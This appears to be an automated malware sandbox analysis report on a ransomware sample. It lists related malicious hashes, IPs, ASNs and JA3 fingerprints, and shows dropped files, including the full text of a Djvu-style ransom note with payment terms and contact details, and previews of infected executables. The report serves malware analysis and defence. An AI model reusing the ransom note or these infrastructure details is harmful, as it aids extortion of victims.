                  D3CA0EF14E8DC45497FABA304ACF842BB2F2913CA2108600EE2771F9E9A24F9C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  C1E3DBF11B5B3D434C8026BB344D5E9FD6DABA717622CCFC4E07CADF051CBA72.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  BF4DCAFE30C748D3AE356DACAEE3C6D33D949E6A6C53DEC1F5FD4EA12D77B505.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  ddos.dnsnb8.netE9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 44.221.84.105
                  dllhost.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EAAA8C691957343A544351907CA063BFC704AA8F604D391FE14126EB0B36C035.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeGet hashmaliciousWannacry, BdaejecBrowse
                  • 44.221.84.105
                  EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  • 44.221.84.105

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSfile.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                  • 1.1.1.1
                  E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 188.114.96.3
                  xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                  • 188.114.96.3
                  https://filmoflix.cxGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  file.exeGet hashmaliciousBabadedaBrowse
                  • 162.159.61.3
                  Endermanch@7ev3n.exeGet hashmalicious7ev3n, Bdaejec, UACMeBrowse
                  • 104.17.11.85
                  Endermanch@LPS2019.exeGet hashmaliciousUnknownBrowse
                  • 104.17.25.14
                  Endermanch@MEMZ.exeGet hashmaliciousBdaejec, KillMBRBrowse
                  • 104.16.183.87
                  https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9iYW5kcm9mZkBzaWduYWxkYy5jb20=Get hashmaliciousHTMLPhisherBrowse
                  • 188.114.96.3
                  fu[1].exeGet hashmaliciousBdaejecBrowse
                  • 172.64.41.3
                  LIVECOMM-ASRespublikanskayastr3k6RUE9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 92.246.89.93
                  LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                  • 92.246.89.93
                  FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 92.246.89.93
                  DA0E4FADC9227BEC63E5BFD562EEFE9682C2131E4DFB8BA2A1A0ECA7C699BB99.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  D3CA0EF14E8DC45497FABA304ACF842BB2F2913CA2108600EE2771F9E9A24F9C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  C1E3DBF11B5B3D434C8026BB344D5E9FD6DABA717622CCFC4E07CADF051CBA72.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                  • 92.246.89.93
                  AMAZON-AESUSE9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 44.221.84.105
                  dllhost.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EAAA8C691957343A544351907CA063BFC704AA8F604D391FE14126EB0B36C035.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeGet hashmaliciousWannacry, BdaejecBrowse
                  • 44.221.84.105
                  EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  eb46b015c1a492b2307a541e45c2ecc0662bc9fc34b5ed028aac2ee2b6b1895c.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EC75DAE286A59F6032A6556E501ECE342C2CA271D1A1CE57C25761747312C301.exeGet hashmaliciousBdaejecBrowse
                  • 44.221.84.105
                  EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                  • 44.221.84.105

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                  • 188.114.97.3
                  Endermanch@7ev3n.exeGet hashmalicious7ev3n, Bdaejec, UACMeBrowse
                  • 188.114.97.3
                  file.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  file.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_100.exeGet hashmaliciousGuLoaderBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_100.exeGet hashmaliciousGuLoaderBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_156.exeGet hashmaliciousXRedBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_160.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRAT, XRedBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_156.exeGet hashmaliciousXRedBrowse
                  • 188.114.97.3

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\$WinREAgent\Scratch\_readme.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1106
                  Entropy (8bit):4.884025328365006
                  Encrypted:false
                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJx13b:WZHfv0p6WVFPFWrDGT0f/kj53b
                  MD5:35779C10C1797CD75D7E64C8579FED59
                  SHA1:68C0A5BF86F957E8976300A74F20F2785EEE204A
                  SHA-256:ABE1851BFD95CAC28F57A85B9770513ECB91F6A1629F879832AE653BD808CBE5
                  SHA-512:E2A89A0143FBA496DCCE1322CCDF88A576BEBB2F8D0C1EA13D2F5CF288D689DEA27672DCE969CE49AE9740E06C31E8B0FD197A447997D6B54DEEE1F56E483022
                  Malicious:true
                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

                  C:\$WinREAgent\_readme.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1106
                  Entropy (8bit):4.884025328365006
                  Encrypted:false
                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJx13b:WZHfv0p6WVFPFWrDGT0f/kj53b
                  MD5:35779C10C1797CD75D7E64C8579FED59
                  SHA1:68C0A5BF86F957E8976300A74F20F2785EEE204A
                  SHA-256:ABE1851BFD95CAC28F57A85B9770513ECB91F6A1629F879832AE653BD808CBE5
                  SHA-512:E2A89A0143FBA496DCCE1322CCDF88A576BEBB2F8D0C1EA13D2F5CF288D689DEA27672DCE969CE49AE9740E06C31E8B0FD197A447997D6B54DEEE1F56E483022
                  Malicious:true
                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):19456
                  Entropy (8bit):6.591224230523235
                  Encrypted:false
                  SSDEEP:384:1FOSZXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:fXQGPL4vzZq2o9W7GsxBbPr
                  MD5:1B890E85EFE552C3584E3C1C60B8192C
                  SHA1:D9CCF0FDA68B7FD75DAA3CD7B3DECDDF946CE8C8
                  SHA-256:496A3D9E25F8D824AD5AC778F336ECE5C970E66C6D960A6B28C5AB86020BF391
                  SHA-512:922054F04634B7B0A2F542EF0E4ACB66AC6EDA4E07739CF9F8D42183A9C6BB444599DBFA62DCEC86801D6B336AF4B0A653C86A9769F464BBB74289119DBC62F0
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):2389504
                  Entropy (8bit):6.731350897593112
                  Encrypted:false
                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                  MD5:5DBF1D5B40ABD334A9EAC948F27C8446
                  SHA1:D91BE2BB67F005512B40BEB5BE037B96623ECC2F
                  SHA-256:C38B225D1B9018B24B03AF9BF3570EAEA2AAC6E362C6D8005C670BC9333AAD69
                  SHA-512:78E22C3CA110A2E378343AA967AFFEC33A4712187C5ADD3406EE2A70637695135D8B340B205EEC26700CD9DE6AEB7AFA2E1EE63D2CE8C4E79AD39C28F010F545
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                  C:\Program Files\7-Zip\Uninstall.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):31744
                  Entropy (8bit):6.366466935533529
                  Encrypted:false
                  SSDEEP:768:uWQ3655Kv1X/qY1MSda6QGPL4vzZq2o9W7GsxBbPr:uHqaNrFda5GCq2iW7z
                  MD5:980DF1D5E7EB6E22AF02CC063D28525D
                  SHA1:01A436A93705C7E19F3BFADB5BFC6D7054B23EBD
                  SHA-256:DC983C4F8D694D5D54BE9664E83ACAEAB09EA740DC1A4EF9397D6E1AF06A8F0B
                  SHA-512:9B7372F44140444AED065B9336E038EE0E9E829DF00CF5198D7256F0808BA64AFE6B8EE94D8B717688F93F02327564085BD459454FFE3B4428A0DD80A5AC4D66
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_HhVfIB.exe_b0ca3af4fe298fe45c9d6b124c24ad5da7d4d115_9d0746b3_ebb891be-eb8a-488a-990f-278da7642f4a\Report.wer

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9894275758084364
                  Encrypted:false
                  SSDEEP:192:mo8Hb7dC0I0GeMI5jUfgmzuiFgZ24IO8wfV:/G7dJIvelj4zuiFgY4IO8qV
                  MD5:B58DED8EE9F4FB6E83AB3975CDF07515
                  SHA1:2E7FECCDBE131543EC56AB53DD243ADAA49E3EB1
                  SHA-256:87B68357A68FAF90BF2B83DDF3842E63E313F4257889DD056F9D2243A705A29F
                  SHA-512:E9DD3B9E4F086294918815427EBB1A4B8BDE20DA7C2A086E4045C156070BFC390EDD48EE0BFAA06A2A1CC2BA7FB3DABD9B042FAB0626F7EF9C78ABA30F1E66D1
                  Malicious:false
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.6.1.0.0.4.4.9.6.2.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.6.1.0.1.8.7.1.5.1.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.b.8.9.1.b.e.-.e.b.8.a.-.4.8.8.a.-.9.9.0.f.-.2.7.8.d.a.7.6.4.2.f.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.d.5.9.1.c.2.-.c.0.8.f.-.4.f.9.a.-.b.0.1.f.-.8.c.5.e.f.3.c.a.b.1.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.h.V.f.I.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.5.0.-.0.0.0.1.-.0.0.1.4.-.b.2.1.d.-.9.0.e.8.e.f.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.c.c.f.2.a.6.8.2.0.d.a.a.2.c.2.2.2.c.6.f.8.0.2.9.6.8.1.5.8.1.7.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.H.h.V.f.I.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE3E.tmp.dmp

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 00:08:21 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):162036
                  Entropy (8bit):1.787016460035342
                  Encrypted:false
                  SSDEEP:768:Vcp9A1LjpVNfE950r9HFpN5fU9ugxELX/:SpClBE9Wr9HzTMYgOLX/
                  MD5:9133FBB05EC1EFA55FEF73E4F5D3D545
                  SHA1:E18AF5E469A5521A65B7C73B077D167EE2079119
                  SHA-256:751386DF2F2559F791378CCCFDF57B1C53BD503AA43B6DD1F0494B7E056C693D
                  SHA-512:A7B97A94C677782410F5F6612BF11C5F85CCAFDA9AADF247D458F06B089DA4565099F5048BB5FB5F1D58E74EA54B484852B701D1DEC5689307DEC53151B1B63C
                  Malicious:false
                  Preview:MDMP..a..... .........f............t...............|.......4...hQ..........T.......8...........T...........8<...<.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......P.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1F8.tmp.WERInternalMetadata.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6268
                  Entropy (8bit):3.7218559188297897
                  Encrypted:false
                  SSDEEP:96:RSIU6o7wVetbpOL6ovYmlmGjf5aMQUB89beEsfBToKm:R6l7wVeJpOL6AYmlzpDB89beEsfBsKm
                  MD5:E28F4E6F859287E46B751B5DA14B2A0F
                  SHA1:94832E4E59DA88FCC47682723E14B10DAD79689C
                  SHA-256:9D60965C980005EE9CE9A0A847CFB52E7E95B1C14657B4A303404E58882E131B
                  SHA-512:A254D32CB98AD5A5F52AA8CD41BE8C3BA3F7CC13092DAA8BDB6FAAC204D4EE95820A45D0795C0DF5A63AD54E3A1519221F100642978CA2B9D9DDA88F7B14CE73
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.8.<./.P.i.

                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF295.tmp.xml

                  Download File
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4551
                  Entropy (8bit):4.452879024820355
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zs2Jg77aI9XkWpW8VYUdYm8M4JQKGxeF9+q8lCTE0023gAad:uIjfMI7t97V38J96iECwZ8gAad
                  MD5:C8562440658F72CEC8743BD6CD47E0CB
                  SHA1:955FBDC9CCF8882E149657E63710B7532A3AB872
                  SHA-256:E2837FACA608EA7B9724D58D5D56619072F9712051E217872FB6FD55B98EECB3
                  SHA-512:89EF21DAE60A7F5E6B78B562BBE762AB99DB7AB8C3918FFED0216509ACA14DFE6D5FE993EBE082AC127839E7140622C448F7CB2B03678193DC330E67B871B34C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427151" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                  C:\SystemID\PersonalID.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):42
                  Entropy (8bit):5.0886296251082035
                  Encrypted:false
                  SSDEEP:3:UGBMOsdV5oljqGMzu:UbOsVolWbzu
                  MD5:2C0919DC4D59DD87FF4A09DA22EA3E97
                  SHA1:142A1B8D66FBC8DB7C5EF363806C14DDB45B99D0
                  SHA-256:8768E12D0EDCB831F3259EBC93AEACE6112F250F91A266283139DD39C79CF675
                  SHA-512:C9CA20176C7E558589F6CE4B7AAF6880D725EC66B6466694A561B438A0F039662E4F32F9277A507B71855E74D7780DED77EA136B1A2D24E477F77463385A8F24
                  Malicious:false
                  Preview:i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1..

                  C:\Users\user\.curlrc

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):7.310625205380679
                  Encrypted:false
                  SSDEEP:6:KWkqc2qWN0C1xjCrwdbVfLIY5zmdAzz8FggobOsVolWbz6Wcii96Z:Nk40WjcC5X/H8FDM36Wcii9a
                  MD5:D854F943C4A0488D65BA7790742BF9D5
                  SHA1:494967BFD3375CB6B9DDCDD4A1410D3021CB01FA
                  SHA-256:C2E8F5B9148BECC5B3CAEEFB4C6946EA64B123BD27CFF938DAC8C20248B651D4
                  SHA-512:1546207D33114600E55E02C5836BF20A74EEEE325659365FC537123B7FF56B40995DAF960CBC9385B1DF5D991C4D26624B82D519691EBB8E39CAA5325B4B63CE
                  Malicious:false
                  Preview:insec%....09G...d......03<.FJ........B...s......R../Q.r.2...5.....w.%..&...L....z.dCE3..`......Tu.6Q%ze>!...uF.ZA?d...1<.H.s...[?.d./D=@3\.....[VpD.90.........n....`.$...'`5.Q..-2.G.Q.S.t]/...w..._S:......u...Mr..?$.y...O...Yt...z..?..O...5..&;X..u0..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\.curlrc.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):7.310625205380679
                  Encrypted:false
                  SSDEEP:6:KWkqc2qWN0C1xjCrwdbVfLIY5zmdAzz8FggobOsVolWbz6Wcii96Z:Nk40WjcC5X/H8FDM36Wcii9a
                  MD5:D854F943C4A0488D65BA7790742BF9D5
                  SHA1:494967BFD3375CB6B9DDCDD4A1410D3021CB01FA
                  SHA-256:C2E8F5B9148BECC5B3CAEEFB4C6946EA64B123BD27CFF938DAC8C20248B651D4
                  SHA-512:1546207D33114600E55E02C5836BF20A74EEEE325659365FC537123B7FF56B40995DAF960CBC9385B1DF5D991C4D26624B82D519691EBB8E39CAA5325B4B63CE
                  Malicious:false
                  Preview:insec%....09G...d......03<.FJ........B...s......R../Q.r.2...5.....w.%..&...L....z.dCE3..`......Tu.6Q%ze>!...uF.ZA?d...1<.H.s...[?.d./D=@3\.....[VpD.90.........n....`.$...'`5.Q..-2.G.Q.S.t]/...w..._S:......u...Mr..?$.y...O...Yt...z..?..O...5..&;X..u0..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                  Download File
                  Process:C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):631
                  Entropy (8bit):7.630934009465508
                  Encrypted:false
                  SSDEEP:12:kQJCd+sD1hUL/HEEk7i6Aq1aDVoPrQRFHVlyhPUv/OYOMrB2Uhui36Wcii9a:JUDD1hMHEEku7D1lePWO1UT3zbD
                  MD5:AB1F59CC1841DC3048B30200822C2BC4
                  SHA1:18ABAB9D34D81ED3F516C7FCE4A005292FEC4B96
                  SHA-256:6144E503C36743E654682E504078DBCF5148229AB17379B073F0852FD45C637C
                  SHA-512:26499FBCFD609308E1C5EB5AC68886D29693519CF7675B6067AB6E01EABDBB1C9B2CAF46443FBCD72F91785440D6509AE0CA6D6634282610DED9CB474C0C2433
                  Malicious:false
